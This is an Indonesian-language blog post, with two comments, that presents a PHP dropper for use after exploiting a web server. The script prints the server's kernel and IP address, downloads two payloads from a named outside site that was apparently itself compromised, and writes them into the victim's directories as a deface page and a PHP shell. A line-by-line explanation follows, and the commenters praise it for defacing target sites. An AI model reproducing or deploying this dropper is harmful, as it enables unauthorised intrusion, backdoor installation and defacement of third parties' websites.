Beranda » script » tips » Tips Upload File Sekaligus

Tips Upload File Sekaligus

Kategori , - diposting pada 23.42 - Ada 2 Tanggapan

Assalamualaikum Warahmatullahi Wabarakatu

Hari ini saya akan membagi tips yang mungkin kamu sudah tahu, yakni bagaimana kita mengupload beberapa file sekaligus kedalam sebuah server dengan fungsi php file_get_contents. Tips ini sangat bermanfaat seumpamanya kamu menemukan exploit yang dimana letak direktorinya itu sama/tetap.

Sehingga kamu tidak usah lagi mengupload script secara bergantian. Disisi lain, file php ini sangat kecil ukurannya, karena didalamnya hanya berisi perintah untuk memanggil script lain, jadi sangat cocok buat dipakai sebagai file upload. Mirip sih sebenarnya dengan php backdoor yang biasa kita sebut Shell, cuman saya lebih sering upload ini dulu.

Berikut contoh script php yang biasa saya pakai: 

<?php 
echo '0zie';
echo 'Kernel    : <b>'.php_uname().'</b>';
echo 'Server IP :<b>'.$_SERVER["SERVER_ADDR"].'</b>';
 $content = file_get_contents("http://www.mecklenburger-radtour.de/typo3conf/ext/jm_recaptcha/zi/id.txt");
 $file = file_get_contents("http://www.mecklenburger-radtour.de/typo3conf/ext/jm_recaptcha/zi/z.txt");
$b = fopen("../../../../id.htm", "w");
fwrite($b,$content);
fclose($b);
 $b = fopen("../../zi.php", "w");
fwrite($b,$file);
fclose($b);
 ?>

Keterangan: 

  1. echo '0zie';
    (menampilkan teks yang keluar nanti di halaman web.)
  2. echo 'Kernel    : '.php_uname().'';
echo 'Server IP :'.$_SERVER["SERVER_ADDR"].'';
    (menampilan jenis serta tahun kernel yang disertai dengan ip servernya.)
  3.  $content = file_get_contents("http://www.mecklenburger-radtour.de/typo3conf/ext/jm_recaptcha/zi/id.txt");
    (memanggil script yang sudah saya pasang di web lain)
  4.  $file = file_get_contents("http://www.mecklenburger-radtour.de/typo3conf/ext/jm_recaptcha/zi/z.txt");
    (memanggil script kedua, sama seperti nomor 3)
  5. $b = fopen("../../../../id.htm", "w");
fwrite($b,$content);
fclose($b);
    (memanggil script pertama yang diberi nama $content, kemudian dibuat pada dir yang telah ditentukan dengan nama id.htm.)
  6. $b = fopen("../../zi.php", "w");
fwrite($b,$file);
fclose($b);
    (memanggil script kedua yang diberi nama $file, kemudian dibuat pada dir yang telah ditentukan dengan nama zi.php.)

Itulah tadi tips yang sudah lama sebenarnya, tapi sangat bermanfaat untuk mempercepat proses. Semoga hal diatas bermanfaat untuk pembelajaran kita semua.

Terima Kasih kepada d3b~x yang telah memberitahukan saya mengenai ini, sebenarnya dulu sering pake wget, cuma kata dia, server sekarang banyak yang mendisable wget.

Kalau ada saran atau apa, tulis di komentar aja. Maaf juga kalau ada salah, soalnya bukan anak TI, jadi opini cuma asal aja :D


Label: ,

2 komentar

Unknown Admin
10 November 2013 pukul 22.40

Wah . ternyata begini yah rahasianya , xixix ..

Makasi pak , sangat mudah , kita cuma tinggal execusi web target , ketika File nya ke upload , Htm atau script deface kita langsung masuk :D

Super pak (y)

Reply
0zie Admin
12 November 2013 pukul 01.20

Iya do..

Neh buat pemula, kalau kamu pasti pake private shell :D

Reply

Posting Komentar